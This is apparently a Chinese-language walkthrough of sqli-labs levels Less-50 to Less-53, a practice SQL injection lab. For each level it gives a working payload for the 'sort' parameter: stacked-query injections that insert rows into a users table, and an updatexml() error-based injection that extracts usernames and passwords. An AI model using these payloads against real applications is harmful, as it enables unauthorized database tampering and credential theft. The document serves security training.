- Less-50
堆叠注入
看源码使用了mysqli_multi_query()函数
出现了该函数可考虑堆叠注入
构造payload:
?sort=2;insert%20users(id,username,password)%20values(100,%271%27,%271%27)
1.png
插入成功
- Less-51
加'号看到又错误回显,updatexml()函数注入即可,payload:
?sort=1' or updatexml(1,(select concat('$',username,'$',password) from users limit 0,1),1)%23
2.png
注入成功
堆叠注入也一样,page-3的注入方法都差不多
- Less-52
无报错回显,无法报错注入
堆叠注入构造payload:
?sort=2;insert%20users(id,username,password)%20values(101,%271%27,%271%27)%23
3.png
注入成功
- Less-53
无报错回显,单字符注入
构造payload:
?sort=1';insert users(id,username,password) values(102,'1','1')%23
4.png
注入成功
网友评论